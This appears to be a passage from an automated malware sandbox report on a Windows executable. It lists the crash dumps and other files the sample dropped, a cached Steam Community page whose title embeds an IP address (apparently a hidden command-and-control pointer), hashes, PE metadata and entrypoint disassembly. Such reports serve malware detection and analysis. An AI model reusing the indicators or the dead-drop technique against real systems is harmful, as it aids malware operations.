                                                                                                                                                                      SSDEEP:192:gGSlvLZsHW0BU/Yj7UZr2QhmdzuiF7Z24IO83H:ulvLiH9BU/YjZtdzuiF7Y4IO83H
                                                                                                                                                                      MD5:7BD11AEC86DE96C53A821C5E744610CF
                                                                                                                                                                      SHA1:9C4CD0EA674D12D6AC13C71AFBA6D283A71566BF
                                                                                                                                                                      SHA-256:0623C8DF17E6BB3257698FFF66A3A6ADFE827FBE032D38B2ED606FCCC323B575
                                                                                                                                                                      SHA-512:A7D9FC1524AFBAC981828B9D711DFEDE2C250C8B69247DB91D136DF84126C59371A636F2B8E9BF27B1CF4C139903D4F9E97AE8A19DB5481D8A372882910F2018
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.8.7.9.7.2.8.0.9.6.2.2.2.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.8.7.9.7.2.9.2.8.3.7.3.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.d.4.3.e.3.d.9.-.5.d.0.4.-.4.3.2.0.-.9.1.f.6.-.e.2.9.2.0.4.6.f.1.0.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.a.0.7.f.2.d.4.-.9.e.3.1.-.4.6.1.e.-.9.9.e.f.-.e.b.5.d.3.6.5.0.8.2.b.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.a.Z.m.1.E.Z.2.I.Y.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.a.8.-.0.0.0.1.-.0.0.1.4.-.a.7.5.4.-.f.4.2.d.b.a.2.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.d.1.0.1.3.7.d.e.d.5.c.d.7.d.c.1.e.9.a.e.a.5.e.f.4.2.f.d.4.1.5.0.0.0.0.f.f.f.f.!.0.0.0.0.d.a.0.a.e.9.9.a.e.b.b.d.e.6.4.3.3.c.8.d.c.9.8.5.e.8.c.8.b.2.3.0.5.c.d.b.9.b.5.4.!.a.Z.m.1.E.Z.2.I.Y.r...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_aZm1EZ2IYr.exe_b472e834091e64353d02c5689452117e2161926_ac611e5f_c325af49-0a9f-41f3-819f-eca31df3b74a\Report.wer

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                      Entropy (8bit):1.1389179810418568
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:4l4LUzHW0JnFwj7UZr2Qhm4zuiF7Z24IO83HiB:4l4LgH9JnFwjZt4zuiF7Y4IO83HiB
                                                                                                                                                                      MD5:BB0DE6E437D966CA7BB36BB2CAA0CDC2
                                                                                                                                                                      SHA1:E89F00E9D12A2016E643CEBEBE2F7FC4130317AE
                                                                                                                                                                      SHA-256:4D9F4F84C28B6EA5D549E09EABE73CCB5D8204AC4AC075B8C9595C09895AE519
                                                                                                                                                                      SHA-512:8F63B22FF23889CB5768A7B767F69C44A58541858AC8F53E1215421E742674A022146970526567784CE0C23DC410829CD571BED0D30FC87BDDA8C4969252497E
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.8.7.9.7.2.7.0.1.8.1.1.0.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.2.5.a.f.4.9.-.0.a.9.f.-.4.1.f.3.-.8.1.9.f.-.e.c.a.3.1.d.f.3.b.7.4.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.7.9.e.e.4.c.c.-.c.3.6.b.-.4.2.7.b.-.b.d.5.3.-.7.2.f.0.d.1.3.4.f.d.a.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.a.Z.m.1.E.Z.2.I.Y.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.a.8.-.0.0.0.1.-.0.0.1.4.-.a.7.5.4.-.f.4.2.d.b.a.2.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.d.1.0.1.3.7.d.e.d.5.c.d.7.d.c.1.e.9.a.e.a.5.e.f.4.2.f.d.4.1.5.0.0.0.0.f.f.f.f.!.0.0.0.0.d.a.0.a.e.9.9.a.e.b.b.d.e.6.4.3.3.c.8.d.c.9.8.5.e.8.c.8.b.2.3.0.5.c.d.b.9.b.5.4.!.a.Z.m.1.E.Z.2.I.Y.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.2.0.:.0.3.:.3.2.!.5.f.e.8.2.!.a.Z.m.1.E.Z.2.I.Y.r...e.x.e.....B.o.o.t.

                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER49D9.tmp.dmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Sun Oct 20 06:35:27 2024, 0x1205a4 type
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):174320
                                                                                                                                                                      Entropy (8bit):1.9767900190997831
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:SPtKwUdRXutXhVv2g53GVbW7kQZ9IDxQ0XznwZuMLtYAAnFqW/agyOFPP:YgwtxJ53GVbWwQZ9Qx77S5tWagyOh
                                                                                                                                                                      MD5:A86FE3F84FA1E496D9C529808CBD0A33
                                                                                                                                                                      SHA1:E7ED2A84B9B86693E24DADBB4A54BD37E3333705
                                                                                                                                                                      SHA-256:C08843040DAE459F3361A181BDE0FC8AE6402F45DBBF020DE50999902BF0E89E
                                                                                                                                                                      SHA-512:303E1AFD42BD6F713351F12D0792B1A14C12B74A80597CC334669FEDD250662C9FA03EAE56E0E98D0880330B62454D42424C487D433DFD584A5D4FDE28480EE1
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:MDMP..a..... ..........g......................... ..(.......$....)......d....V..........`.......8...........T...........xV..xR...........)...........+..............................................................................eJ......P,......GenuineIntel............T..............g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER4B41.tmp.WERInternalMetadata.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8352
                                                                                                                                                                      Entropy (8bit):3.6986790189691052
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:R6l7wVeJYS6TQ6Y9nSUPgmfSaK/p0t89bAi1fQgm:R6lXJ16TQ6YtSUPgmfSaKNAYfu
                                                                                                                                                                      MD5:DB6C2483F54C89F5E72CFFE005705994
                                                                                                                                                                      SHA1:16377F57072EC673A3C4AE294A544263E1985327
                                                                                                                                                                      SHA-256:BF93910DC9FC3661F3CC49DE45D26A453A8EFC58CC532D193C4E92114E1E9568
                                                                                                                                                                      SHA-512:9F6DF3C4F90E2E87AC4CCDC066BC55480DE37D4CFCCE59DC9488D7EA6DF0F1CE41F183DF66A067AAF0E1242DC617B39A1288CA68D6574B3C43A683E54583F232
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.3.6.<./.P.i.

                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER4B71.tmp.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4593
                                                                                                                                                                      Entropy (8bit):4.466544294519342
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:uIjfxnI7NR7V6JGLDsO5aI05uZ92uq2ukd:uItnYNR70yOQUK
                                                                                                                                                                      MD5:AF77C37E0D21EEA8C2DD614FF1109618
                                                                                                                                                                      SHA1:5CE4CB2224265414F634F0917CFF6D1DC3E3D1E2
                                                                                                                                                                      SHA-256:13B0412FB153CEE126B0287581A63C5C330DDAF28289BDACB29A213FE4CD6F1E
                                                                                                                                                                      SHA-512:291702554583C339CD99733D194ACBDF90411B80144F73B701A353FF7C00004FDD42F7359A9A7F1F048E95E0AE09BA647F0C6F119A93ABB657A0032C2B726A5F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="551378" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER4E0F.tmp.dmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Sun Oct 20 06:35:28 2024, 0x1205a4 type
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):188078
                                                                                                                                                                      Entropy (8bit):1.9071525541392529
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:7HoGXdRle3sj9aEc+QZ9IZxQUm5IJvnFqz/ZI8UJZ:7Ho3GsEc+QZ92xDm5IJvWZI3J
                                                                                                                                                                      MD5:D0FF1FCCBE1C337AA132BB4FFDD87FBA
                                                                                                                                                                      SHA1:CC0C6F07FC5C03F8C1612FAF477E403FB2B881F4
                                                                                                                                                                      SHA-256:B08C1A3F169290F88B2E4356C9FE33CC0A08A00F4B0D525567EF31A0113E46A1
                                                                                                                                                                      SHA-512:CA28C3654348F0D89C7A3A207B352F204F3DB5F3F3CB29C718F7C00ACC74E231034AB57CB526E7741FEBA284C9129076CEFC84C7B3B2F1694FFD661E758C3522
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:MDMP..a..... ..........g............t...........X!..........$....*......$....]..........`.......8...........T...........X]..V............+...........,..............................................................................eJ.......-......GenuineIntel............T..............g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER50C0.tmp.WERInternalMetadata.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8352
                                                                                                                                                                      Entropy (8bit):3.6993440266909747
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:R6l7wVeJYc6g6Y9XSUbgmfSaKuprM89bXisfnu9m:R6lXJr6g6YdSUbgmfSaKCXhfV
                                                                                                                                                                      MD5:B689F3E72B33EC7A26A4500B8FF00EA6
                                                                                                                                                                      SHA1:4E2647E86A5E4D42C1D0A2070E81EB1CAA535B03
                                                                                                                                                                      SHA-256:B7F4649A2C0CD04F02157D9039024499D1A3149B89725290D20E4E9DA691EDBE
                                                                                                                                                                      SHA-512:0FF86CA13C259C4D3D8E6391AD517C0D7E03D9382D3F6100B06EC422D37B6B927154ADD40953927FE5EB9C525662529B5B93E2F3836141285F8595753DA24264
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.3.6.<./.P.i.

                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER50F0.tmp.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4593
                                                                                                                                                                      Entropy (8bit):4.46657828892958
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:uIjfxnI7NR7VEJGLDIIaI05uZ92uq2uld:uItnYNR7aN6OQU7
                                                                                                                                                                      MD5:853DAB20B2AD7015178F4B3B99E0D570
                                                                                                                                                                      SHA1:C371FD89D5B63095F8DCDB69D94FA365D879B34D
                                                                                                                                                                      SHA-256:E68674E04ED9D53475A92035F096E4B1BE80A155AC31858C8C26A6D6F7698CB3
                                                                                                                                                                      SHA-512:341639ADF23F96D3690ACEFC00A4F753D67499DCACE86EA56EC1A1592C6D2C7E3EEB52BB10187A6D6BFB60591DBBB0AB69DEC0C5AF3D122C931FD8E107328788
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="551378" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199786602107[1].htm

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\aZm1EZ2IYr.exe
                                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3146), with CRLF, LF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):34619
                                                                                                                                                                      Entropy (8bit):5.4012643309463915
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:768:J7pqLjWYmmwB5DPgqaciNGAnTBv++nIjBtPF5zfukPco1AULTBv++nIjBtPF5x2P:J78LjWYmmwB5DPgqaccnTBv++nIjBtPJ
                                                                                                                                                                      MD5:E33D40189B3287C741A087AEF273EDDC
                                                                                                                                                                      SHA1:58B51F71B48BC71D732C0ECF1163966789028E60
                                                                                                                                                                      SHA-256:729BAF2F95511FBF29C7FBC4F88970137FDD48115C7F750FAF663CFD86F73FBC
                                                                                                                                                                      SHA-512:324843F9A688A2A9EC003AD7013E4CDFC3721563269B487933A5D92B02B66B9E5DE2A08A5C7AB56E014A04714AD948DDE8F2B7A917D742E692BAF693B70894EA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: g0b4c https://65.109.142.154|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=nBdvNPPzc0qI&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.

                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\delays.tmp

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\aZm1EZ2IYr.exe
                                                                                                                                                                      File Type:ISO-8859 text, with very long lines (65536), with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1048575
                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:/:/
                                                                                                                                                                      MD5:6990D911DF524479494DCF8F4E7ED771
                                                                                                                                                                      SHA1:6ECFC973C8D7AB67FC0D4543944480D0ED225FAE
                                                                                                                                                                      SHA-256:EC5FA004C2DA04D9AA021BD2A82A8E71AF1698E76B8BDED8676D35A588538B67
                                                                                                                                                                      SHA-512:4581C529293C39F80A2CCCBD9D5DE2F82E9B78DDE53CE577A636358DA98BD3E8BD51D07F7AC10D127F33DA77E334CA16C32D811325027EAF52660BC3EF0CB3AF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                      Entropy (8bit):4.4654299658794665
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:RIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNBdwBCswSbY:yXD94+WlLZMM6YFHH+Y
                                                                                                                                                                      MD5:009C97A146E71ACA2F287B495932C3A2
                                                                                                                                                                      SHA1:076D3E6326107553E436254E27FAB1D8AB4FFCE5
                                                                                                                                                                      SHA-256:AF1C0A84EA0163E4CF41C3A4A1C315551148261713933EA8C1353F197FF05D75
                                                                                                                                                                      SHA-512:67A8D387E5C584F352DAB01954D4632D1E59B9DB21E07871BB10D27ED841E8EDF55AA543D72E67964D7EB8F5AB378C5AF3B674A9E4E4DA6BBE268CCDED98D590
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...?."..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                      Static File Info

                                                                                                                                                                      General

                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                      Entropy (8bit):6.4851745888202075
                                                                                                                                                                      TrID:
                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                      File name:aZm1EZ2IYr.exe
                                                                                                                                                                      File size:392'704 bytes
                                                                                                                                                                      MD5:1e1d5412616216fd90ea3cb6a87353db
                                                                                                                                                                      SHA1:da0ae99aebbde6433c8dc985e8c8b2305cdb9b54
                                                                                                                                                                      SHA256:765eb00651ebf6ddbc9c8d6e687292dae89f0d8260cea08505020992835208d8
                                                                                                                                                                      SHA512:fcffb031004aa683656cd2d8ada0703255dd6fd01bf7e2b811e919ee33d4dff9b80ca6f17f44436c2a10d6bafa0abc4fb6c5f3151f167524293302841b00fbe3
                                                                                                                                                                      SSDEEP:6144:MGO+83+N11n5au8LvOWjTMZG6wn+O8qkx0wKYHMCsHW+S0ZaaPG:MGOv3+N11n5ALvpjTACn+dqk0VYExdZa
                                                                                                                                                                      TLSH:51849D1623E130F6F2225534B6494721CBAB78341622F75FABC805656FE6BC1EE2C71B
                                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?d.]^..]^..]^..2(..E^..2(..R^..2(..b^..T&..X^..T&..M^...'..^^..]^...^..2(..M^..2(..\^..Rich]^..........................PE..L..

                                                                                                                                                                      File Icon

                                                                                                                                                                      Icon Hash:90cececece8e8eb0

                                                                                                                                                                      Static PE Info

                                                                                                                                                                      General

                                                                                                                                                                      Entrypoint:0x4184f0
                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, TERMINAL_SERVER_AWARE
                                                                                                                                                                      Time Stamp:0x67043E94 [Mon Oct 7 20:03:32 2024 UTC]
                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                      OS Version Minor:1
                                                                                                                                                                      File Version Major:5
                                                                                                                                                                      File Version Minor:1
                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                      Subsystem Version Minor:1
                                                                                                                                                                      Import Hash:118187c3a5a9d853faf932e2bfb655fe

                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                      Instruction
                                                                                                                                                                      je 00007F1FD0E37EC5h
                                                                                                                                                                      jne 00007F1FD0E37EC3h
                                                                                                                                                                      mov eax, FEA66EE8h
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax+000181E8h], edi
                                                                                                                                                                      add byte ptr [ebx+eax+75h], dh
                                                                                                                                                                      add dword ptr [eax-01741D18h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-01729318h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-01729D18h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-0172A718h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-0170AB18h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-0172BB18h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-0172C518h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-0172CF18h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-0170BB18h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-0172E318h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-0172ED18h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-0172F718h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-01708C18h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-01730B18h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-01731518h], edi
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax-01731F18h], edi
                                                                                                                                                                      jmp far eax
                                                                                                                                                                      mov ebp, 74FFFE90h
                                                                                                                                                                      add esi, dword ptr [ebp+01h]
